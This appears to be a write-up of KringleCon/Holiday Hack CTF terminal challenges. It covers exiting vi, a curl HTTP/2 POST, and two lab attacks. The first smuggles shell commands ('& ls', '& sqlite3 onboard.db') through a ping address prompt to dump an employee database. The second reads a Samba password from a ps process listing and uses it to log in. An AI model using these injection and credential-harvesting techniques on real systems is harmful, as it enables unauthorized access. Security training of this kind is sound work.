Terminals
Essential Editor Skills
How to find the terminal
Terminal is located just to the right once you enter the castle. Look for Bushy Evergreen.
Hints:
Bushy Evergreen provides the hint Vi Editor Basics
Goal
Simply exit the VI editor program.
Approach
This may be trivial task for those with experience in VI, but in reality, I guarantee everyone that has used VI had to look up these basic commands. Review the provided hint and you will find the solution.
Solution
Simply type the following into the terminal:
:wq
This will save and close the VI program.
Alternatives
You could also force a close without saving...
:q!
Or simply exit...
:q
Name Game
Terminal Prompt
We just hired this new worker, Californian or New Yorker? Think he's making some new toy bag... My job is to make his name tag. Golly gee, I'm glad that you came, I recall naught but his last name! Use our system or your own plan, Find the first name of our guy "Chan!" -Bushy Evergreen To solve this challenge, determine the new worker's first name and submit to runtoanswer. ==================================================================== = = = S A N T A ' S C A S T L E E M P L O Y E E O N B O A R D I N G = = = ==================================================================== Press 1 to start the onboard process. Press 2 to verify the system. Press q to quit. Please make a selection:
Background Information
We know we are looking for an opportunitity to call a program where it might not be intended to be called.
Hints:
Goal
Determine the first name of the new employee.
Approach
Test call as described in the hint & ls
to see if we can get a directory listing (even though the input is expecting an IP address that it can ping. The shell will interpret our string after the "&" as a command and execute.
Validating data s tore for employee onboard information. Enter address of server: & ls Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface] [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos] [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline] [-W timeout] [hop1 ...] destination menu.ps1 onboard.db runtoanswer onboard.db: SQLite 3.x database Press Enter to continue...:
We see that this indeed provided a directory listing and there are three files present.
- menu.ps1 (The Powershell script that is providing the interactive prompts)
- onboard.db (May contain the data we are looking for)
- runtoanswer (Looks like this is a program we may have to submit our answer to)
No lets try at access the database contents. Assuming it is a SQlite DB we can run the following:
Validating data store for employee onboard information. Enter address of server: & sqlite3 onboard.db Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface] [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos] [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline] [-W timeout] [hop1 ...] destination SQLite version 3.11.0 2016-02-15 17:29:24 Enter ".help" for usage hints. sqlite> .tables onboard sqlite> select * from onboard; 10|Karen|Duck|52 Annfield Rd||BEAL|DN14 7AU|077 8656 6609|karensduck@einrot.com 11|Josephine|Harrell|3 Victoria Road||LITTLE ASTON|B74 8XD|079 5532 7917|josephinedharrell@einrot.com 12|Jason|Madsen|4931 Cliffside Drive||Worcester|12197|607-397-0037|jasonlmadsen@einrot.com 13|Nichole|Murphy|53 St. John Street||Craik|S4P 3Y2|306-734-9091|nicholenmurphy@teleworm.us 14|Mary|Lyons|569 York Mills Rd||Toronto|M3B 1Y2|416-274-6639|maryjlyons@superrito.com 15|Luz|West|1307 Poe Lane||Paola|66071|913-557-2372|luzcwest@rhyta.com 16|Walter|Savell|4782 Neville Street||Seymour|47274|812-580-5138|walterdsavell@fleckens.hu sqlite> PRAGMA table_info(onboard); 0|id|INTEGER|0||1 1|fname|TEXT|1||0 2|lname|TEXT|1||0 3|street1|TEXT|0||0 4|street2|TEXT|0||0 5|city|TEXT|0||0 6|postalcode|TEXT|0||0 7|phone|TEXT|0||0 8|email|TEXT|0||0 sqlite> select * from onboard where lname is 'Chan'; 84|Scott|Chan|48 Colorado Way||Los Angeles|90067|4017533509|scottmchan90067@gmail.com
The next step is to submit the answer. Lets try the same technique as wel used with Sqlite3 and try and run "runtoanswer".
Validating data store for employee onboard information. Enter address of server: & ./runtoanswer Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface] [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos] [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline] [-W timeout] [hop1 ...] destination Loading, please wait...... Enter Mr. Chan's first name: Scott .;looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooool:' 'ooooooooooookOOooooxOOdodOOOOOOOdoxOOdoooooOOkoooooooxO000Okdooooooooooooo; 'oooooooooooooXMWooooOMMxodMMNKKKKxoOMMxoooooWMXoooookNMWK0KNMWOooooooooooooo; :oooooooooooooXMWooooOMMxodMM0ooooooOMMxoooooWMXooooxMMKoooooKMMkooooooooooooo coooooooooooooXMMMMMMMMMxodMMWWWW0ooOMMxoooooWMXooooOMMkoooookMM0ooooooooooooo coooooooooooooXMWdddd0MMxodMM0ddddooOMMxoooooWMXooooOMMOoooooOMMkooooooooooooo coooooooooooooXMWooooOMMxodMMKxxxxdoOMMOkkkxoWMXkkkkdXMW0xxk0MMKoooooooooooooo cooooooooooooo0NXooookNNdodXNNNNNNkokNNNNNNOoKNNNNNXookKNNWNXKxooooooooooooooo cooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo cooooooooooooooooooooooooooooooooooMYcNAMEcISooooooooooooooooooooooooooooooooo cddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddo OMMMMMMMMMMMMMMMNXXWMMMMMMMNXXWMMMMMMWXKXWMMMMWWWWWWWWWMWWWWWWWWWMMMMMMMMMMMMW OMMMMMMMMMMMMW: .. ;MMMk' .NMX:. . .lWO d xMMMMMMMMMMMW OMMMMMMMMMMMMo OMMWXMMl lNMMNxWK ,XMMMO .MMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW OMMMMMMMMMMMMX. .cOWMN 'MMMMMMM; WMMMMMc KMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW OMMMMMMMMMMMMMMKo, KN ,MMMMMMM, WMMMMMc KMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW OMMMMMMMMMMMMKNMMMO oM, dWMMWOWk cWMMMO ,MMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW OMMMMMMMMMMMMc ... cWMWl. .. .NMk. .. .oMMMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW xXXXXXXXXXXXXXKOxk0XXXXXXX0kkkKXXXXXKOkxkKXXXXXXXKOKXXXXXXXKO0XXXXXXXXXXXXXXXK .oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo, .looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo, .,cllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllc;. Congratulations! onboard.db: SQLite 3.x database Press Enter to continue...:
Solution
Using the above command we find that the first name of "Chan" is "Scott". Submitting this to "runtoanswer" confirmed our discovery.
Curling Master
Terminal Prompt
..................................... ...',,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,'.... ...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,'... ......'''''''''''''''''''''''',,,,,,,'... ............................',,,,,,,... ...,,,,,,'... ..',,,,,,'.. ...,,,,,,,... ...,,,,,,,... ........................................,,,,,,,'...... .....''''''''''''''''''''''''''''''''''''',,,,,,,,,,'''..... ............................................................... ............................................................... .:llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllc. .llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll; 'llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll: .kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk: o0000000000000000000000000000000000000000000000000000000000000000000000O O00000000000000000000000000000000000000000000000000000000000000000000000' O00000000000000000000000000000000000000000000000000000000000000000000000' d0000000000000000000000000000000000000000000000000000000000000000000000O. 'OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOc ,llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll: ,llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll: .clllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll' 'clllllllllllllllllllllllllllllllllllllllllllllllllllllllllll, .,clllllllllllllllllllllllllllllllllllllllllllllllllllll;. .';:cllllllllllllllllllllllllllllllllllllllllcc;,.. I am Holly Evergreen, and now you won't believe: Once again the striper stopped; I think I might just leave! Bushy set it up to start upon a website call. Darned if I can CURL it on - my Linux skills apall. Could you be our CURLing master - fixing up this mess? If you are, there's one concern you surely must address. Something's off about the conf that Bushy put in place. Can you overcome this snag and save us all some face? Complete this challenge by submitting the right HTTP request to the server at http://localhost:8080/ to get the candy striper started again. You may view the contents of the nginx.conf file in /etc/nginx/, if helpful. elf@4603a459f5f2:~$
Approach
Checking the nginx.conf file we see the server is running the new http2 protocol:
cat /etc/nginx/nginx.conf ... server { # love using the new stuff! -Bushy listen 8080 http2; # server_name localhost 127.0.0.1; root /var/www/html; location ~ [^/]\.php(/|$) { ...
Knowing the server is expecting the http2 protocol and is likely serving a index.php file, lets see what we get when we send a simple GET request:
elf@e854cc838c86:/etc/nginx$ curl --http2-prior-knowledge http://localhost:8080/index.php <html> <head> <title>Candy Striper Turner-On'er</title> </head> <body> <p>To turn the machine on, simply POST to this URL with parameter "status=on" </body> </html>
That worked! Now lets take send the requested data to the site with a POST command:
elf@e854cc838c86:/etc/nginx$ curl -X POST --http2-prior-knowledge http://localhost:8080/index.php -d 'status=on' <html> <head> <title>Candy Striper Turner-On'er</title> </head> <body> <p>To turn the machine on, simply POST to this URL with parameter "status=on" okkd, OXXXXX, oXXXXXXo ;XXXXXXX; ;KXXXXXXx oXXXXXXXO .lKXXXXXXX0. '''''' .'''''' .'''''' .:::; ':okKXXXXXXXX0Oxcooddool, 'MMMMMO',,,,,;WMMMMM0',,,,,;WMMMMMK',,,,,,occccoOXXXXXXXXXXXXXxxXXXXXXXXXXX. 'MMMMN;,,,,,'0MMMMMW;,,,,,'OMMMMMW:,,,,,'kxcccc0XXXXXXXXXXXXXXxx0KKKKK000d; 'MMMMl,,,,,,oMMMMMMo,,,,,,lMMMMMMd,,,,,,cMxcccc0XXXXXXXXXXXXXXOdkO000KKKKK0x. 'MMMO',,,,,;WMMMMMO',,,,,,NMMMMMK',,,,,,XMxcccc0XXXXXXXXXXXXXXxxXXXXXXXXXXXX: 'MMN,,,,,,'OMMMMMW;,,,,,'kMMMMMW;,,,,,'xMMxcccc0XXXXXXXXXXXXKkkxxO00000OOx;. 'MMl,,,,,,lMMMMMMo,,,,,,cMMMMMMd,,,,,,:MMMxcccc0XXXXXXXXXXKOOkd0XXXXXXXXXXO. 'M0',,,,,;WMMMMM0',,,,,,NMMMMMK,,,,,,,XMMMxcccckXXXXXXXXXX0KXKxOKKKXXXXXXXk. .c.......'cccccc.......'cccccc.......'cccc:ccc: .c0XXXXXXXXXX0xO0000000Oc ;xKXXXXXXX0xKXXXXXXXXK. ..,:ccllc:cccccc:' Unencrypted 2.0? He's such a silly guy. That's the kind of stunt that makes my OWASP friends all cry. Truth be told: most major sites are speaking 2.0; TLS connections are in place when they do so. -Holly Evergreen <p>Congratulations! You've won and have successfully completed this challenge. <p>POSTing data in HTTP/2.0. </body> </html>
Solution
Send the following POST request using the new http2 protocol via Curl:
curl -X POST --http2-prior-knowledge http://localhost:8080/index.php -d 'status=on'
Stall Mucking Report
https://docker.kringlecon.com/?challenge=plaintext-creds
Terminal Prompt
kxc,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, kkkxc,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, kkkkkxl,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, kkkkkkkkl;,,c,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o:,,,,,,,,,,, kkkkkkkkkkok0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0K;,,,,,,,,,, kkkkkkkkkkOXXd,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dXXl,,,,,,,,,, kkkkkkkkkkOXXXk:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,;,,,,,dXXXc,,,,,,,,,, kkkkkkkkkkk0XXXXk:,,k:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,:K:,,l0XXXO,,,,,,,,,,, kkkkkkkkkkkk0XXXXXOkXx,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,xX0xKXXXXk,,,,,,,,,,,, kkkkkkkkkkkkkOKXXXXXXXkxddo;,,,,,,,,,,,,,,,,,,,,,,,,cddxkXXXXXXXkc,,,,,,,,,,,,, kkkkkkkkkkkkkkkk00KXXXXXkl,,,,,,,,,,,,oKOc,,,,,,,,,,,:xXXXX0kdc;,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkKXXXKx:,,,,,,,,;dKXXXX0l,,,,,,,,cxXXXXk,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkk0XXXXX0xoc;,;dKXXXXXXXX0l;:cokKXXXXKo,,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkk0KXXXXXXXXXXXXXXXXXXXXXXXXXXXXKkl,,,,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkkkkkOO00XXXXXXXXXXXXXXXXXXXxc:;,,,,,,,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkkkkkkO0XNWWNNXXXXXXXXXXNNWWN0o,,,,,,,,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkkkkO0XWMMMMMMNXXXXXXXNWMMMMMMNKo,,,,,,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkkk0XXWMMMMMMMMNXXXXXXWMMMMMMMMNX0c,,,,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkOKXXNMMMMMMMMMWXXXXXNMMMMMMMMMWXXXx,,,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkOXXXXNMMMMMMMMMMXXXXXNMMMMMMMMMWXXXXk,,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkKXXXXNMMMMXl:dWWXXXXXNMXl:dWMMMWXXXXXd,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkk0XXXXXXNMMMo KNXXXXXXNo KMMMNXXXXXX;,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkKXXXXXXXNWMM0kKNXXXXXXXXN0kXMMWNXXXXXXXo,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkXXXXXXXXXXNNNNXXXX0xxKXXXXNNNNXXXXXXXXXx,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkXXXXXXXXXXXXXXXXX' oXXXXXXXXXXXXXXXXd,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkk0XXXXXXXXXXXXXXXX. cXXXXXXXXXXXXXXXXc,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkOXXXXXXXXXXXXXXXXXdllkXXXXXXXXXXXXXXXXk,,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkk0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXkl,,,,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkk0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXOkkkl;,,,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkkOXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXKkkkkkkko;,,,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkkkk0XXXXXXXXXXXXXXXXXXXXXXXXXXXKOkkkkkkkkkkd:,,,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkkkkkkOKXXXXXXXXXXXXXXXXXXXXXXKOkkkkkkkkkkkkkkd:,,,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkO0KXXXXXXXXXXXXXXK0Okkkkkkkkkkkkkkkkkkkd:,,,,,,,, kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkOO000000OOkkkkkkkkkkkkkkkkkkkkkkkkkkxc,,,,,, kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkxl,,,, kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkxl,, kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx; Thank you Madam or Sir for the help that you bring! I was wondering how I might rescue my day. Finished mucking out stalls of those pulling the sleigh, My report is now due or my KRINGLE's in a sling! There's a samba share here on this terminal screen. What I normally do is to upload the file, With our network credentials (we've shared for a while). When I try to remember, my memory's clean! Be it last night's nog bender or just lack of rest, For the life of me I can't send in my report. Could there be buried hints or some way to contort, Gaining access - oh please now do give it your best! -Wunorse Openslae Complete this challenge by uploading the elf's report.txt file to the samba share at //localhost/report-upload/ elf@394f4ff50540:~$
Approach
Lets see where the report.txt file is located so we can determine our next steps.
elf@394f4ff50540:~$ ls
report.txt
Found it. Now, we need to upload it to the server but we don't have the password to the share. Based on the hints provided we will likely be able to find the password previously used by looking at recent commands run on the machine. If a password is entered into the command line it often will be showin in a process listing. Let us check:
elf@394f4ff50540:~$ ps -auxf | more USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 17952 2780 pts/0 Ss 15:14 0:00 /bin/bash /sbin/init root 10 0.0 0.0 45320 3176 pts/0 S 15:14 0:00 sudo -u manager /home/manager/samba-wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not-run-as-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special --suppress --suppress //localhost/report-upload/ ***directreindeerflatterystable*** -U report-upload manager 17 0.0 0.0 9500 2592 pts/0 S 15:14 0:00 \_ /bin/bash /home/manager/samba-wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not-run-as-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special --suppress --suppress //localhost/report-upload/ directreindeerflatterystable -U report-upload manager 36 0.0 0.0 4196 660 pts/0 S 15:17 0:00 \_ sleep 60 root 11 0.0 0.0 45320 3212 pts/0 S 15:14 0:00 sudo -E -u manager /usr/bin/python /home/manager/report-check.py manager 16 0.0 0.0 33848 8132 pts/0 S 15:14 0:00 \_ /usr/bin/python /home/manager/report-check.py root 15 0.0 0.0 45320 3068 pts/0 S 15:14 0:00 sudo -u elf /bin/bash elf 18 0.0 0.0 18208 3304 pts/0 S 15:14 0:00 \_ /bin/bash elf 37 0.0 0.0 36636 2960 pts/0 R+ 15:18 0:00 \_ ps -auxf elf 38 0.0 0.0 6420 920 pts/0 S+ 15:18 0:00 \_ more root 23 0.0 0.0 316680 15384 ? Ss 15:14 0:00 /usr/sbin/smbd root 24 0.0 0.0 308372 5824 ? S 15:14 0:00 \_ /usr/sbin/smbd root 25 0.0 0.0 308388 5568 ? S 15:14 0:00 \_ /usr/sbin/smbd root 27 0.0 0.0 316664 5928 ? S 15:14 0:00 \_ /usr/sbin/smbd
Sure enough, it looks like the password was entered directly on the command line and was "directreindeerflatterystable".
Now, we can use smbclient to connect to the share and try and upload the file.
elf@394f4ff50540:~$ smbclient --help Usage: smbclient service <password>
elf@394f4ff50540:~$ smbclient //localhoast/report-upload/ directreindeerflatterystable WARNING: The "syslog" option is deprecated Connection to localhoast failed (Error NT_STATUS_UNSUCCESSFUL)
Well that didn't work. Maybe it is expecting a different user account.
Looking back at the command ps command we see the portion -U report-upload
. This must be the user account. So lets try with that.
elf@394f4ff50540:~$ smbclient //localhost/report-upload/ -U report-upload directreindeerflatterystable WARNING: The "syslog" option is deprecated Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.12-Debian] smb: \>
We are in! What commands can we run?
smb: \> ? ? allinfo altname archive backup blocksize cancel case_sensitive cd chmod chown close del dir du echo exit get getfacl geteas hardlink help history iosize lcd link lock lowercase ls l mask md mget mkdir more mput newer notify open posix posix_encrypt posix_open posix_mkdir posix_rmdir posix_unlink posix_whoami print prompt put pwd q queue quit readlink rd recurse reget rename reput rm rmdir showacls setea setmode scopy stat symlink tar tarmode timeout translate unlock volume vuid wdel logon listconnect showconnect tcon tdis tid logoff .. !
"put" seems to be the command to send the file to the share.
smb: \> put report.txt putting file report.txt as \report.txt (250.5 kb/s) (average 250.5 kb/s) smb: \> Terminated elf@394f4ff50540:~$ .;;;;;;;;;;;;;;;' ,NWOkkkkkkkkkkkkkkNN; ..KM; Stall Mucking ,MN.. OMNXNMd. .oMWXXM0. ;MO l0NNNNNNNNNNNNNNN0o xMc :MO xMl '. :MO dOOOOOOOOOOOOOOOOOd. xMl :l:. .cc::::::::;;;;;;;;;;;,oMO .0NNNNNNNNNNNNNNNNN0. xMd,,,,,,,,,,,,,clll:. 'kkkkxxxxxddddddoooooooxMO ..'''''''''''. xMkcccccccllllllllllooc. 'kkkkxxxxxddddddoooooooxMO .MMMMMMMMMMMMMM, xMkcccccccllllllllllooool 'kkkkxxxxxddddddoooooooxMO '::::::::::::, xMkcccccccllllllllllool, .ooooollllllccccccccc::dMO xMx;;;;;::::::::lllll' :MO .ONNNNNNNNXk xMl :lc' :MO dOOOOOOOOOo xMl ;. :MO 'cccccccccccccc:' xMl :MO .WMMMMMMMMMMMMMMMW. xMl :MO ............... xMl .NWxddddddddddddddddddddddddNW' ;ccccccccccccccccccccccccc; You have found the credentials I just had forgot, And in doing so you've saved me trouble untold. Going forward we'll leave behind policies old, Building separate accounts for each elf in the lot. -Wunorse Openslae
Looks like that did it! We successfully obtained the credentials by looking at previously issues commands via the ``ps``` command and used them to connect to the protected Samba share.
Note
In this excersise we used the command smbclient //localhost/report-upload/ -U report-upload directreindeerflatterystable
which could expose the password to the ps command. Instead, we should have excluded the password from the command and waited for it to prompt:
bash hl_lines="3"
elf@394f4ff50540:~$ smbclient //localhost/report-upload/ -U report-upload
WARNING: The "syslog" option is deprecated
Enter report-upload's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.12-Debian]
smb: \>
The Sleighbell
https://docker.kringlecon.com/?challenge=unlinked-function
Dev Ops Fail
https://docker.kringlecon.com/?challenge=gitpasshist
Python escape from
https://docker.kringlecon.com/?challenge=python_docker_challenge
Lethal ForensicELFication
https://docker.kringlecon.com/?challenge=viminfo
Yule Log Analysis
https://docker.kringlecon.com/?challenge=spray-detect